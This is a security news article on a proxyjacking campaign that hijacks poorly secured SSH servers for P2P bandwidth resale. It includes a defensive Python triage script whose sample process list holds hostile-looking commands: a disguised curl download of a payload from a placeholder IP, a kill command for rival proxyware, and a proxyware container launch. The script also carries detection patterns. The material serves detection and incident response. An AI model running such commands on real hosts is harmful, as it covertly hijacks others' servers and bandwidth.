SSH Servers at Risk in Ongoing Proxyjacking Campaign Orchestrated by Cybercriminals

A financially motivated campaign currently under way is targeting poorly secured SSH servers in order to covertly enlist them in a proxy network.

Akamai researcher Allen West noted in a report that the attacker uses SSH for remote access and then runs malicious scripts that quietly enrol the victim servers in a peer-to-peer (P2P) proxy network such as Peer2Profit or Honeygain.

This form of attack, known as proxyjacking, differs from cryptojacking, in which a compromised system's compute resources are used to mine cryptocurrency without authorisation. In proxyjacking, the attacker instead monetises the victim's unused bandwidth by quietly running the host as a P2P proxy node for various services.

This offers the attacker a dual advantage. First, the surplus bandwidth is turned directly into profit. Second, sharing bandwidth places a far lighter load on the host than cryptomining does, so the activity is less likely to be detected.

West described proxyjacking as a stealthier alternative to cryptojacking, with serious implications that could compound the problems already posed by proxied Layer 7 attacks.

The anonymity that proxyware services provide can also be abused by malicious actors, who can route their traffic through intermediary nodes to obscure the true origin of an attack.

Akamai said the latest campaign, first observed on June 8, 2023, breaks into vulnerable SSH servers and drops an obfuscated Bash script. The script then fetches its dependencies from a compromised web server, including a copy of the curl command-line tool disguised as a CSS file ("csdark.css").

The script first finds and kills any competing bandwidth-sharing services already running on the host, then launches Docker containers that share the victim's bandwidth for profit.
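The chain described above leaves artifacts an incident responder can look for on a host: a process running a binary named after the disguised download, a command that kills rival proxyware, and containers built from proxyware images. The following triage script is an added example written for this article, not Akamai's tooling or anything from the campaign itself; it parses `ps` and `docker ps` output and flags those three patterns. The marker strings (the Peer2Profit and Honeygain names, the "csdark.css" file name) come from the article, but the exact process arguments, image names, paths and IP address in the sample data are constructed assumptions.

```python
import re

# Indicator strings used by this example. The article names Peer2Profit and
# Honeygain as the proxyware families involved and "csdark.css" as the name under
# which the campaign's curl binary was served; the exact process and image names
# below are assumptions, not indicators published by Akamai.
PROXYWARE_MARKERS = ("peer2profit", "honeygain")
DROPPED_FILE_MARKER = "csdark.css"
KILL_RE = re.compile(r"\b(?:pkill|killall)\b.*(?:peer2profit|honeygain)")


def scan_processes(ps_lines):
    """Triage `ps -eo pid,user,args` output.

    Returns (pid, user, reason, args) for each suspicious process: a command
    that kills competing proxyware, an executable carrying the dropper's file
    name, or a process that belongs to a known proxyware family.
    """
    findings = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue                      # header or truncated line
        pid, user, args = parts
        lowered = args.lower()
        if KILL_RE.search(lowered):
            findings.append((pid, user, "kills competing proxyware", args))
        elif DROPPED_FILE_MARKER in lowered:
            findings.append((pid, user, "campaign dropper artifact", args))
        elif any(marker in lowered for marker in PROXYWARE_MARKERS):
            findings.append((pid, user, "proxyware process", args))
    return findings


def scan_containers(docker_lines):
    """Triage `docker ps --format '{{.ID}} {{.Image}} {{.Status}}'` output.

    Returns (container id, image, reason) for containers built from a
    proxyware image.
    """
    findings = []
    for line in docker_lines:
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        cid, image = parts[0], parts[1]
        if any(marker in image.lower() for marker in PROXYWARE_MARKERS):
            findings.append((cid, image, "proxyware container"))
    return findings


# Constructed sample output standing in for a compromised host; the IP address
# is from the documentation range and the paths are invented.
SAMPLE_PS = [
    "  PID USER     COMMAND",
    "    1 root     /sbin/init",
    "  842 root     /usr/sbin/sshd -D",
    " 1337 root     /bin/bash /tmp/.x/run.sh",
    " 1340 root     /tmp/.x/csdark.css -s -o /tmp/.x/p2p http://203.0.113.5/p2p",
    " 1355 root     pkill -f honeygain",
    " 1402 root     docker run -d peer2profit/peer2profit_linux",
]
SAMPLE_DOCKER = [
    "3f2a1c9d8e7b honeygain/honeygain Up 2 hours",
    "9a8b7c6d5e4f nginx:1.25 Up 3 days",
]

if __name__ == "__main__":
    for finding in scan_processes(SAMPLE_PS) + scan_containers(SAMPLE_DOCKER):
        print(finding)
```

On a live host, feed the functions the real output of `ps -eo pid,user,args` and `docker ps --format '{{.ID}} {{.Image}} {{.Status}}'`; the kill-command check is deliberately placed first so that a `pkill honeygain` line is reported as the campaign's competitor-removal step rather than as the proxyware itself.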

Closer analysis of the compromised web server showed that it also hosts a cryptocurrency miner, suggesting the threat actors are running cryptojacking and proxyjacking attacks in parallel.

Not all proxyware use is malicious, but Akamai pointed out that some proxyware companies do not verify where the IP addresses in their networks come from, and occasionally even encourage people to install the software on their work computers.

The activity crosses into cybercrime when the applications are installed without the users' consent, giving the threat actor control over many systems from which to generate illicit revenue.

According to West, old techniques remain effective, especially when paired with new outcomes. He stressed that standard security practices, including strong passwords, patch management and thorough logging, remain an effective defence.